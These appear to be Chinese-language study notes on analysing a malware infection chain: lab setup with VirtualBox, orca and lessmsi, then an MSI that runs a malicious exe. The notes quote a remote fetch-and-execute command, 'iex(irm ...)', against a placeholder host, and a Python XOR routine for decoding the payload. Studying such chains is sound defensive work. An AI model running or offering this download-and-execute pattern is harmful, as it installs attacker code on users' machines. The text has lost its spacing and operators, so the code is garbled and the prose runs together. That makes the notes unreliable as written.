
学习目标恶意代码分析学习内容例如搭建环境virtualbox安装工具orca、lessmsi下载链cmd中执行iex(irmhttttps://xxxx)加密外壳defxor_hex(hex_str,key,key_lenNone):outnlen(key)ifkey_lenisNoneelsekey_lenforiinrange(0,len(hex_str),2):bint(hex_str[i:i2],16)kord(key[(i//2)%n])outchr(b^k)returnout下载加密代码到环境变量中使用执行命令执行控制变量中的代码。攻击链加载msi执行恶意exe学习时间2026100120261002学习产出梳理出从一条命令到恶意文件过程学习博客https://xz.aliyun.com/news/15571https://blog.csdn.net/weixin_28607671/article/details/164176694https://huorong.cn/document/tech/vir_report/2024